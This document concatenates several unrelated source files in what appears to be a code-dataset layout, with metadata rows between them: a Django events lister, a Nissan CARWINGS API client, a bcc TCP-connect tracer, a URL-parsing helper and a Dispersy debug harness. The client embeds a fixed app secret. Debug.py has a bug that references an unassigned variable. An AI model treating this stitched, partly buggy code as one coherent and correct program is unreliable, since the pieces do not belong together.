forthcoming = Q(date__gte=self.now) | \
Q(single_day_event=False, end_date__gte=self.now)
if "forthcoming_events" in self.item_collections:
self.forthcoming_events = self.actual_events.filter(forthcoming)
if "previous_events" in self.item_collections:
self.previous_events = self.actual_events.exclude(
forthcoming
).reverse()
self.items = getattr(self, self.item_collections[0])
def set_items_for_person(self):
self.items = self.items.filter(please_contact=self.person) | \
self.items.filter(featuring=self.person)
def set_items_for_place(self):
self.items = self.items.filter(building=self.place)
def other_items(self):
other_items = []
if "forthcoming_events" in self.other_item_kinds and self.forthcoming_events.exists():
other_items.append({
"link": self.entity.get_auto_page_url("events-forthcoming"),
"title": "All forthcoming events",
"count": self.forthcoming_events.count(),
})
if "previous_events" in self.other_item_kinds and self.previous_events.exists():
other_items.append({
"link": self.entity.get_auto_page_url("events-archive"),
"title": "Previous events",
"count": self.previous_events.count(),
})
if "main" in self.other_item_kinds:
auto_page_title = menu.menu_dict["title_attribute"]
if not MULTIPLE_ENTITY_MODE:
title = getattr(self.entity, auto_page_title)
else:
title = "%s %s" % (
self.entity.short_name,
getattr(self.entity, auto_page_title).lower()
)
other_items.append({
"link": self.entity.get_auto_page_url("news-and-events"),
"title": title,
"css_class": "main"
})
return other_items
class EventsListCurrent(EventsList):
item_collections = ("forthcoming_events", "previous_events")
other_item_kinds = ("previous_events", "forthcoming_events")
class EventsListPlugin(EventsList):
item_collections = ("forthcoming_events",)
class EventsListForPlace(EventsList):
item_collections = ("forthcoming_events",)
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_place()
self.create_item_collections()
self.truncate_items()
self.set_show_when()
class EventsListForPerson(EventsList):
item_collections = ("forthcoming_events",)
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_person()
self.create_item_collections()
self.truncate_items()
self.set_show_when()
class EventsArkestraGenericFilterSet(ArkestraGenericFilterSet):
fields = ['date', 'type']
class EventsFilterList(EventsList):
filter_set = EventsArkestraGenericFilterSet
search_fields = [
{
"field_name": "text",
"field_label": "Title/summary",
"placeholder": "Search",
"search_keys": [
"title__icontains",
"summary__icontains",
],
},
]
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.create_item_collections()
self.filter_on_search_terms()
self.itemfilter = self.filter_set(self.items, self.request.GET)
class EventsListForthcoming(EventsFilterList):
item_collections = ("forthcoming_events", "previous_events")
other_item_kinds = ("previous_events", "main")
heading_text = _(u"Forthcoming events")
class EventsListArchive(EventsFilterList):
item_collections = ("previous_events", "forthcoming_events")
other_item_kinds = ("forthcoming_events", "main")
heading_text = _(u"Previous events")
class NewsAndEventsCurrentLister(ArkestraGenericLister):
listkinds = [
("news", NewsListCurrent),
("events", EventsListCurrent),
]
display = "news events"
order_by = "importance/date"
layout = NEWS_AND_EVENTS_LAYOUT
limit_to = LISTER_MAIN_PAGE_LIST_LENGTH
class NewsAndEventsMenuLister(ArkestraGenericLister):
listkinds = [
("news", NewsListCurrent),
("events", EventsListCurrent),
]
display = "news and events"
limit_to = LISTER_MAIN_PAGE_LIST_LENGTH
class NewsAndEventsPluginLister(ArkestraGenericPluginLister):
listkinds = [
("news", NewsListPlugin),
("events", EventsListPlugin),
]
def other_items(self):
link = self.entity.get_auto_page_url(menu.menu_dict["url_attribute"])
return [{
"link": link,
"title": "More %s" % self.display,
"css_class": "main"
}]
class NewsAndEventsPersonLister(ArkestraGenericLister):
layout = NEWS_AND_EVENTS_LAYOUT
listkinds = [
("news", NewsListForPerson),
("events", EventsListForPerson),
]
display = "news events"
class NewsArchiveLister(ArkestraGenericLister):
listkinds = [("news", NewsListArchive)]
display = "news"
class EventsArchiveLister(ArkestraGenericLister):
listkinds = [("events", EventsListArchive)]
display = "events"
item_format = "details image venue"
class EventsForthcomingLister(ArkestraGenericLister):
listkinds = [("events", EventsListForthcoming)]
display = "events"
item_format = "details image venue"
class EventsPlaceLister(ArkestraGenericLister):
listkinds = [("events", EventsListForPlace)]
display = "events"
| bsd-2-clause | -7,668,943,796,908,751,000 | 31.421951 | 94 | 0.576168 | false |
jdhorne/pycarwings2 | pycarwings2/pycarwings2.py | 1 | 13350 | # Copyright 2016 Jason Horne
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
When logging in, you must specify a geographic 'region' parameter. The only
known values for this are as follows:
NNA : USA
NE : Europe
NCI : Canada
NMA : Australia
NML : Japan
Information about Nissan on the web (e.g. http://nissannews.com/en-US/nissan/usa/pages/executive-bios)
suggests others (this page suggests NMEX for Mexico, NLAC for Latin America) but
these have not been confirmed.
There are three asynchronous operations in this API, paired with three follow-up
"status check" methods.
request_update -> get_status_from_update
start_climate_control -> get_start_climate_control_result
stop_climate_control -> get_stop_climate_control_result
The asynchronous operations immediately return a 'result key', which
is then supplied as a parameter for the corresponding status check method.
Here's an example response from an asynchronous operation, showing the result key:
{
"status":200,
"userId":"[email protected]",
"vin":"1ABCDEFG2HIJKLM3N",
"resultKey":"12345678901234567890123456789012345678901234567890"
}
The status check methods return a JSON blob containing a 'responseFlag' property.
If the communications are complete, the response flag value will be the string "1";
otherwise the value will be the string "0". You just gotta poll until you get a
"1" back. Note that the official app seems to poll every 20 seconds.
Example 'no response yet' result from a status check invocation:
{
"status":200,
"responseFlag":"0"
}
When the responseFlag does come back as "1", there will also be an "operationResult"
property. If there was an error communicating with the vehicle, it seems that
this field will contain the value "ELECTRIC_WAVE_ABNORMAL". Odd.
"""
import requests
from requests import Request, Session, RequestException
import json
import logging
from datetime import date
from responses import *
import base64
from Crypto.Cipher import Blowfish
import binascii
BASE_URL = "https://gdcportalgw.its-mo.com/gworchest_160803A/gdc/"
log = logging.getLogger(__name__)
# from http://stackoverflow.com/questions/17134100/python-blowfish-encryption
def _PKCS5Padding(string):
byteNum = len(string)
packingLength = 8 - byteNum % 8
appendage = chr(packingLength) * packingLength
return string + appendage
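# e.g. _PKCS5Padding("abc") returns "abc" + chr(5) * 5, padding to an 8-byte boundary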
class CarwingsError(Exception):
pass
class Session(object):
"""Maintains a connection to CARWINGS, refreshing it when needed"""
def __init__(self, username, password, region="NNA"):
self.username = username
self.password = password
self.region_code = region
self.logged_in = False
self.custom_sessionid = None
def _request_with_retry(self, endpoint, params):
ret = self._request(endpoint, params)
if ("status" in ret) and (ret["status"] >= 400):
log.error("carwings error; logging in and trying request again: %s" % ret)
# try logging in again
self.connect()
ret = self._request(endpoint, params)
return ret
def _request(self, endpoint, params):
params["initial_app_strings"] = "geORNtsZe5I4lRGjG9GZiA"
if self.custom_sessionid:
params["custom_sessionid"] = self.custom_sessionid
else:
params["custom_sessionid"] = ""
req = Request('POST', url=BASE_URL + endpoint, data=params).prepare()
log.debug("invoking carwings API: %s" % req.url)
log.debug("params: %s" % json.dumps(params, sort_keys=True, indent=3, separators=(',', ': ')))
try:
sess = requests.Session()
response = sess.send(req)
log.debug('Response HTTP Status Code: {status_code}'.format(
status_code=response.status_code))
log.debug('Response HTTP Response Body: {content}'.format(
content=response.content))
        except RequestException:
            log.warning('HTTP Request failed')
            raise CarwingsError("HTTP request failed")
j = json.loads(response.content)
if "message" in j and j["message"] == "INVALID PARAMS":
log.error("carwings error %s: %s" % (j["message"], j["status"]) )
raise CarwingsError("INVALID PARAMS")
if "ErrorMessage" in j:
log.error("carwings error %s: %s" % (j["ErrorCode"], j["ErrorMessage"]) )
raise CarwingsError
return j
def connect(self):
self.custom_sessionid = None
self.logged_in = False
response = self._request("InitialApp.php", {
"RegionCode": self.region_code,
"lg": "en-US",
})
ret = CarwingsInitialAppResponse(response)
c1 = Blowfish.new(ret.baseprm, Blowfish.MODE_ECB)
packedPassword = _PKCS5Padding(self.password)
encryptedPassword = c1.encrypt(packedPassword)
encodedPassword = base64.standard_b64encode(encryptedPassword)
response = self._request("UserLoginRequest.php", {
"RegionCode": self.region_code,
"UserId": self.username,
"Password": encodedPassword,
})
ret = CarwingsLoginResponse(response)
self.custom_sessionid = ret.custom_sessionid
self.gdc_user_id = ret.gdc_user_id
log.debug("gdc_user_id: %s" % self.gdc_user_id)
self.dcm_id = ret.dcm_id
log.debug("dcm_id: %s" % self.dcm_id)
self.tz = ret.tz
log.debug("tz: %s" % self.tz)
self.language = ret.language
log.debug("language: %s" % self.language)
log.debug("vin: %s" % ret.vin)
log.debug("nickname: %s" % ret.nickname)
self.leaf = Leaf(self, ret.leafs[0])
self.logged_in = True
return ret
def get_leaf(self, index=0):
if not self.logged_in:
self.connect()
return self.leaf
class Leaf:
def __init__(self, session, params):
self.session = session
self.vin = params["vin"]
self.nickname = params["nickname"]
self.bound_time = params["bound_time"]
log.debug("created leaf %s/%s" % (self.vin, self.nickname))
def request_update(self):
response = self.session._request_with_retry("BatteryStatusCheckRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
})
return response["resultKey"]
def get_status_from_update(self, result_key):
response = self.session._request_with_retry("BatteryStatusCheckResultRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"resultKey": result_key,
})
# responseFlag will be "1" if a response has been returned; "0" otherwise
if response["responseFlag"] == "1":
return CarwingsBatteryStatusResponse(response)
return None
def start_climate_control(self):
response = self.session._request_with_retry("ACRemoteRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
return response["resultKey"]
def get_start_climate_control_result(self, result_key):
response = self.session._request_with_retry("ACRemoteResult.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
"resultKey": result_key,
})
if response["responseFlag"] == "1":
return CarwingsStartClimateControlResponse(response)
return None
def stop_climate_control(self):
response = self.session._request_with_retry("ACRemoteOffRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
return response["resultKey"]
def get_stop_climate_control_result(self, result_key):
response = self.session._request_with_retry("ACRemoteOffResult.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
"resultKey": result_key,
})
if response["responseFlag"] == "1":
return CarwingsStopClimateControlResponse(response)
return None
# execute time example: "2016-02-09 17:24"
# I believe this time is specified in GMT, despite the "tz" parameter
# TODO: change parameter to python datetime object(?)
def schedule_climate_control(self, execute_time):
response = self.session._request_with_retry("ACRemoteNewRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"ExecuteTime": execute_time,
})
return (response["status"] == 200)
# execute time example: "2016-02-09 17:24"
# I believe this time is specified in GMT, despite the "tz" parameter
# TODO: change parameter to python datetime object(?)
def update_scheduled_climate_control(self, execute_time):
response = self.session._request_with_retry("ACRemoteUpdateRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"ExecuteTime": execute_time,
})
return (response["status"] == 200)
def cancel_scheduled_climate_control(self):
response = self.session._request_with_retry("ACRemoteCancelRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
return (response["status"] == 200)
def get_climate_control_schedule(self):
response = self.session._request_with_retry("GetScheduledACRemoteRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
if (response["status"] == 200):
if response["ExecuteTime"] != "":
return CarwingsClimateControlScheduleResponse(response)
return None
"""
{
"status":200,
}
"""
def start_charging(self):
response = self.session._request_with_retry("BatteryRemoteChargingRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"ExecuteTime": date.today().isoformat()
})
if response["status"] == 200:
return True
return False
def get_driving_analysis(self):
response = self.session._request_with_retry("DriveAnalysisBasicScreenRequestEx.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
if response["status"] == 200:
return CarwingsDrivingAnalysisResponse(response)
return None
def get_latest_battery_status(self):
response = self.session._request_with_retry("BatteryStatusRecordsRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"TimeFrom": self.bound_time
})
if response["status"] == 200:
return CarwingsLatestBatteryStatusResponse(response)
return None
def get_latest_hvac_status(self):
response = self.session._request_with_retry("RemoteACRecordsRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"TimeFrom": self.bound_time
})
if response["status"] == 200:
if "RemoteACRecords" in response:
return CarwingsLatestClimateControlStatusResponse(response)
else:
log.warning('no remote a/c records returned by server')
return None
# target_month format: "YYYYMM" e.g. "201602"
def get_electric_rate_simulation(self, target_month):
response = self.session._request_with_retry("PriceSimulatorDetailInfoRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"TargetMonth": target_month
})
if response["status"] == 200:
return CarwingsElectricRateSimulationResponse(response)
return None
def request_location(self):
response = self.session._request_with_retry("MyCarFinderRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
})
return response["resultKey"]
def get_status_from_location(self, result_key):
response = self.session._request_with_retry("MyCarFinderResultRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"resultKey": result_key,
})
if response["responseFlag"] == "1":
return CarwingsMyCarFinderResponse(response)
return None
| apache-2.0 | -7,215,533,815,677,567,000 | 29.974478 | 102 | 0.703071 | false |
zaafar/bcc | examples/tracing/tcpv4connect.py | 1 | 2519 | #!/usr/bin/python
#
# tcpv4connect Trace TCP IPv4 connect()s.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcpv4connect [-h] [-t] [-p PID]
#
# This is provided as a basic example of TCP connection & socket tracing.
#
# All IPv4 connection attempts are traced, even if they ultimately fail.
#
# Copyright (c) 2015 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 15-Oct-2015 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
BPF_HASH(currsock, u32, struct sock *);
int kprobe__tcp_v4_connect(struct pt_regs *ctx, struct sock *sk)
{
u32 pid = bpf_get_current_pid_tgid();
// stash the sock ptr for lookup on return
currsock.update(&pid, &sk);
return 0;
};
int kretprobe__tcp_v4_connect(struct pt_regs *ctx)
{
int ret = PT_REGS_RC(ctx);
u32 pid = bpf_get_current_pid_tgid();
struct sock **skpp;
skpp = currsock.lookup(&pid);
if (skpp == 0) {
return 0; // missed entry
}
if (ret != 0) {
		// failed to send SYN packet, may not have populated
// socket __sk_common.{skc_rcv_saddr, ...}
currsock.delete(&pid);
return 0;
}
// pull in details
struct sock *skp = *skpp;
u32 saddr = 0, daddr = 0;
u16 dport = 0;
bpf_probe_read(&saddr, sizeof(saddr), &skp->__sk_common.skc_rcv_saddr);
bpf_probe_read(&daddr, sizeof(daddr), &skp->__sk_common.skc_daddr);
bpf_probe_read(&dport, sizeof(dport), &skp->__sk_common.skc_dport);
// output
bpf_trace_printk("trace_tcp4connect %x %x %d\\n", saddr, daddr, ntohs(dport));
currsock.delete(&pid);
return 0;
}
"""
# initialize BPF
b = BPF(text=bpf_text)
# header
print("%-6s %-12s %-16s %-16s %-4s" % ("PID", "COMM", "SADDR", "DADDR",
"DPORT"))
def inet_ntoa(addr):
dq = ''
for i in range(0, 4):
dq = dq + str(addr & 0xff)
if (i != 3):
dq = dq + '.'
addr = addr >> 8
return dq
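# Note: inet_ntoa() emits the least-significant byte as the first octet,
# e.g. inet_ntoa(0x0100007f) -> "127.0.0.1", which matches the byte order
# printed by the BPF program on little-endian machines.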
# filter and format output
while 1:
# Read messages from kernel pipe
try:
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
(_tag, saddr_hs, daddr_hs, dport_s) = msg.split(" ")
except ValueError:
# Ignore messages from other tracers
continue
# Ignore messages from other tracers
if _tag != "trace_tcp4connect":
continue
print("%-6d %-12.12s %-16s %-16s %-4s" % (pid, task,
inet_ntoa(int(saddr_hs, 16)),
inet_ntoa(int(daddr_hs, 16)),
dport_s))
| apache-2.0 | -5,699,068,462,233,235,000 | 22.764151 | 79 | 0.622072 | false |
gtaylor/dockerized-image-crawler | crawler/webapi_service/lib/url_parse_fsm.py | 1 | 1641 | """
Contains a really cheezy quasi-FSM for parsing URL bodies.
"""
def parse_linebreakless_url_str(url_str):
"""
Muddle through a string that contains at least one properly formed URL.
The example submission method results in the URLs running into one long,
un-delimited string.
Rather than require our example user to send linebreaks, we'll just try
to parse these as best we can.
:param str url_str: A string containing at least one valid URL.
:rtype: set
:returns: A set of URLs found within the string.
"""
split_body = url_str.split('/')
urls_to_crawl = set()
current_urlstr = ''
is_in_initial_state = True
for tok in split_body:
if not tok:
continue
if is_in_initial_state and tok not in ['http:', 'https:']:
raise ValueError("URLs must start with a protocol string.")
if tok in ['http:', 'https:']:
if current_urlstr:
# We already had a URL in the cooker, send it off.
urls_to_crawl.add(current_urlstr)
current_urlstr = tok + '//'
is_in_initial_state = False
else:
current_urlstr += tok
# If we had a URL in the buffer at the end of the loop, send it along.
if current_urlstr and _is_fully_baked_url(current_urlstr):
urls_to_crawl.add(current_urlstr)
return urls_to_crawl
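# Illustrative example (added for clarity): two URLs run together, each ending
# in "/", are split back apart. Note that "/" separators are not re-inserted
# between tokens, so this works best for host-level URLs:
#   sorted(parse_linebreakless_url_str("http://example.com/https://example.org/"))
#   # -> ['http://example.com', 'https://example.org']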
def _is_fully_baked_url(url_str):
"""
:param str url_str: The URL to spot check.
:rtype: bool
:returns: True if ``url_str`` appears to be a fully-formed URL.
"""
return url_str not in ['http://', 'https://']
| bsd-3-clause | -3,473,299,123,087,814,700 | 28.303571 | 76 | 0.611213 | false |
egbertbouman/tribler-g | Tribler/Core/dispersy/debug.py | 1 | 17013 | import socket
from authentication import NoAuthentication
from bloomfilter import BloomFilter
from crypto import ec_generate_key, ec_to_public_bin, ec_to_private_bin
from destination import CommunityDestination, AddressDestination
from distribution import DirectDistribution, LastSyncDistribution, FullSyncDistribution
from dprint import dprint
from member import MyMember, Member
from member import PrivateMember, MyMember
from message import Message
from payload import MissingSequencePayload, SyncPayload, SignatureResponsePayload, CandidateRequestPayload, IdentityPayload, SimilarityPayload
from resolution import PublicResolution, LinearResolution
class DebugOnlyMembers(object):
_singleton_instances = {}
@property
def database_id(self):
return Member(self.public_key).database_id
class DebugPrivateMember(DebugOnlyMembers, PrivateMember):
pass
class DebugMyMember(DebugOnlyMembers, MyMember):
pass
class Node(object):
_socket_range = (8000, 8999)
_socket_pool = {}
_socket_counter = 0
def __init__(self):
self._socket = None
self._my_member = None
self._community = None
@property
def socket(self):
return self._socket
def init_socket(self):
assert self._socket is None
port = Node._socket_range[0] + Node._socket_counter % (Node._socket_range[1] - Node._socket_range[0])
Node._socket_counter += 1
if not port in Node._socket_pool:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 870400)
s.setblocking(False)
s.settimeout(0.0)
while True:
try:
s.bind(("localhost", port))
except socket.error, error:
port = Node._socket_range[0] + Node._socket_counter % (Node._socket_range[1] - Node._socket_range[0])
Node._socket_counter += 1
continue
break
Node._socket_pool[port] = s
if __debug__: dprint("create socket ", port)
elif __debug__:
dprint("reuse socket ", port, level="warning")
self._socket = Node._socket_pool[port]
@property
def my_member(self):
return self._my_member
def init_my_member(self, bits=None, sync_with_database=None, candidate=True, identity=True):
        assert bits is None, "The parameter bits is deprecated and must be None"
        assert sync_with_database is None, "The parameter sync_with_database is deprecated and must be None"
ec = ec_generate_key(u"low")
self._my_member = DebugPrivateMember.get_instance(ec_to_public_bin(ec), ec_to_private_bin(ec), sync_with_database=False)
if identity:
# update identity information
assert self._socket, "Socket needs to be set to candidate"
assert self._community, "Community needs to be set to candidate"
source_address = self._socket.getsockname()
destination_address = self._community._dispersy.socket.get_address()
message = self.create_dispersy_identity_message(source_address, 2)
self.send_message(message, destination_address)
if candidate:
# update candidate information
assert self._socket, "Socket needs to be set to candidate"
assert self._community, "Community needs to be set to candidate"
source_address = self._socket.getsockname()
destination_address = self._community._dispersy.socket.get_address()
message = self.create_dispersy_candidate_request_message(source_address, destination_address, self._community.get_conversion().version, [], 1)
self.send_message(message, destination_address)
@property
def community(self):
return self._community
def set_community(self, community):
self._community = community
def encode_message(self, message):
assert isinstance(message, Message.Implementation)
tmp_member = self._community._my_member
        self._community._my_member = self._my_member
try:
packet = self._community.get_conversion().encode_message(message)
finally:
self._community._my_member = tmp_member
return packet
def give_packet(self, packet, verbose=False):
assert isinstance(packet, str)
assert isinstance(verbose, bool)
if verbose: dprint("giving ", len(packet), " bytes")
self._community.dispersy.on_incoming_packets([(self.socket.getsockname(), packet)])
return packet
def give_packets(self, packets, verbose=False):
assert isinstance(packets, list)
assert isinstance(verbose, bool)
if verbose: dprint("giving ", sum(len(packet) for packet in packets), " bytes")
address = self.socket.getsockname()
self._community.dispersy.on_incoming_packets([(address, packet) for packet in packets])
return packets
def give_message(self, message, verbose=False):
assert isinstance(message, Message.Implementation)
assert isinstance(verbose, bool)
self.encode_message(message)
if verbose: dprint("giving ", message.name, " (", len(message.packet), " bytes)")
self.give_packet(message.packet, verbose=verbose)
return message
def give_messages(self, messages, verbose=False):
assert isinstance(messages, list)
assert isinstance(verbose, bool)
map(self.encode_message, messages)
if verbose: dprint("giving ", len(messages), " messages (", sum(len(message.packet) for message in messages), " bytes)")
self.give_packets([message.packet for message in messages], verbose=verbose)
return messages
def send_packet(self, packet, address, verbose=False):
assert isinstance(packet, str)
assert isinstance(address, tuple)
assert isinstance(verbose, bool)
if verbose: dprint(len(packet), " bytes to ", address[0], ":", address[1])
self._socket.sendto(packet, address)
return packet
def send_message(self, message, address, verbose=False):
assert isinstance(message, Message.Implementation)
assert isinstance(address, tuple)
assert isinstance(verbose, bool)
self.encode_message(message)
if verbose: dprint(message.name, " (", len(message.packet), " bytes) to ", address[0], ":", address[1])
self.send_packet(message.packet, address)
return message
def receive_packet(self, timeout=None, addresses=None, packets=None):
        assert timeout is None, "The parameter TIMEOUT is deprecated and must be None"
assert isinstance(addresses, (type(None), list))
assert isinstance(packets, (type(None), list))
while True:
try:
packet, address = self._socket.recvfrom(10240)
except:
raise
if not (addresses is None or address in addresses or (address[0] == "127.0.0.1" and ("0.0.0.0", address[1]) in addresses)):
continue
if not (packets is None or packet in packets):
continue
dprint(len(packet), " bytes from ", address[0], ":", address[1])
return address, packet
def receive_message(self, timeout=None, addresses=None, packets=None, message_names=None, payload_types=None, distributions=None, destinations=None):
        assert timeout is None, "The parameter TIMEOUT is deprecated and must be None"
assert isinstance(addresses, (type(None), list))
assert isinstance(packets, (type(None), list))
assert isinstance(message_names, (type(None), list))
assert isinstance(payload_types, (type(None), list))
assert isinstance(distributions, (type(None), list))
assert isinstance(destinations, (type(None), list))
while True:
address, packet = self.receive_packet(timeout, addresses, packets)
try:
message = self._community.get_conversion(packet[:22]).decode_message(address, packet)
except KeyError:
# not for this community
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (message_names is None or message.name in message_names):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (payload_types is None or message.payload.type in payload_types):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (distributions is None or isinstance(message.distribution, distributions)):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (destinations is None or isinstance(message.destination, destinations)):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
dprint(message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
return address, message
def create_dispersy_identity_message(self, address, global_time):
assert isinstance(address, tuple)
assert len(address) == 2
assert isinstance(address[0], str)
assert isinstance(address[1], int)
assert isinstance(global_time, (int, long))
meta = self._community.get_meta_message(u"dispersy-identity")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(address))
def create_dispersy_candidate_request_message(self, source_address, destination_address, source_default_conversion, routes, global_time):
assert isinstance(source_address, tuple)
assert len(source_address) == 2
assert isinstance(source_address[0], str)
assert isinstance(source_address[1], int)
assert isinstance(destination_address, tuple)
assert len(destination_address) == 2
assert isinstance(destination_address[0], str)
assert isinstance(destination_address[1], int)
assert isinstance(source_default_conversion, tuple)
assert len(source_default_conversion) == 2
assert isinstance(source_default_conversion[0], str)
assert len(source_default_conversion[0]) == 1
assert isinstance(source_default_conversion[1], str)
assert len(source_default_conversion[1]) == 1
assert isinstance(routes, (tuple, list))
assert not filter(lambda route: not isinstance(route, tuple), routes)
assert not filter(lambda route: not len(route) == 2, routes)
assert not filter(lambda route: not isinstance(route[0], tuple), routes)
assert not filter(lambda route: not len(route[0]) == 2, routes)
assert not filter(lambda route: not isinstance(route[0][0], str), routes)
assert not filter(lambda route: not isinstance(route[0][1], (int, long)), routes)
assert not filter(lambda route: not isinstance(route[1], float), routes)
assert isinstance(global_time, (int, long))
meta = self._community.get_meta_message(u"dispersy-candidate-request")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(destination_address),
meta.payload.implement(source_address, destination_address, source_default_conversion, routes))
def create_dispersy_sync_message(self, time_low, time_high, bloom_packets, global_time):
assert isinstance(time_low, (int, long))
assert isinstance(time_high, (int, long))
assert isinstance(bloom_packets, list)
assert not filter(lambda x: not isinstance(x, str), bloom_packets)
assert isinstance(global_time, (int, long))
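        # Summarise the given packets in a bloom filter; it is carried in the sync payload.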
bloom_filter = BloomFilter(1000, 0.001, prefix="x")
map(bloom_filter.add, bloom_packets)
meta = self._community.get_meta_message(u"dispersy-sync")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(time_low, time_high, bloom_filter))
def create_dispersy_similarity_message(self, cluster, community, similarity, global_time):
assert isinstance(cluster, int)
        assert 0 < cluster < 2 ** 8, "CLUSTER must fit in one byte"
assert isinstance(similarity, BloomFilter)
meta = self._community.get_meta_message(u"dispersy-similarity")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(cluster, similarity))
def create_dispersy_missing_sequence_message(self, missing_member, missing_message_meta, missing_low, missing_high, global_time, destination_address):
assert isinstance(missing_member, Member)
assert isinstance(missing_message_meta, Message)
assert isinstance(missing_low, (int, long))
assert isinstance(missing_high, (int, long))
assert isinstance(global_time, (int, long))
assert isinstance(destination_address, tuple)
assert len(destination_address) == 2
assert isinstance(destination_address[0], str)
assert isinstance(destination_address[1], int)
meta = self._community.get_meta_message(u"dispersy-missing-sequence")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(destination_address),
meta.payload.implement(missing_member, missing_message_meta, missing_low, missing_high))
def create_dispersy_signature_request_message(self, message, global_time, destination_member):
        assert isinstance(message, Message.Implementation)
        assert isinstance(global_time, (int, long))
        assert isinstance(destination_member, Member)
meta = self._community.get_meta_message(u"dispersy-signature-request")
return meta.implement(meta.authentication.implement(),
meta.distribution.implement(global_time),
meta.destination.implement(destination_member),
meta.payload.implement(message))
def create_dispersy_signature_response_message(self, request_id, signature, global_time, destination_address):
assert isinstance(request_id, str)
assert len(request_id) == 20
assert isinstance(signature, str)
assert isinstance(global_time, (int, long))
assert isinstance(destination_address, tuple)
assert len(destination_address) == 2
assert isinstance(destination_address[0], str)
assert isinstance(destination_address[1], int)
meta = self._community.get_meta_message(u"dispersy-signature-response")
return meta.implement(meta.authentication.implement(),
meta.distribution.implement(global_time),
meta.destination.implement(destination_address),
meta.payload.implement(request_id, signature))
def create_dispersy_subjective_set_message(self, cluster, subjective_set, global_time):
assert isinstance(cluster, int)
        assert 0 < cluster < 2 ** 8
assert isinstance(subjective_set, BloomFilter)
assert isinstance(global_time, (int, long))
assert global_time > 0
meta = self._community.get_meta_message(u"dispersy-subjective-set")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(cluster, subjective_set))
| lgpl-2.1 | -4,876,651,679,844,654,000 | 48.33432 | 154 | 0.625051 | false |
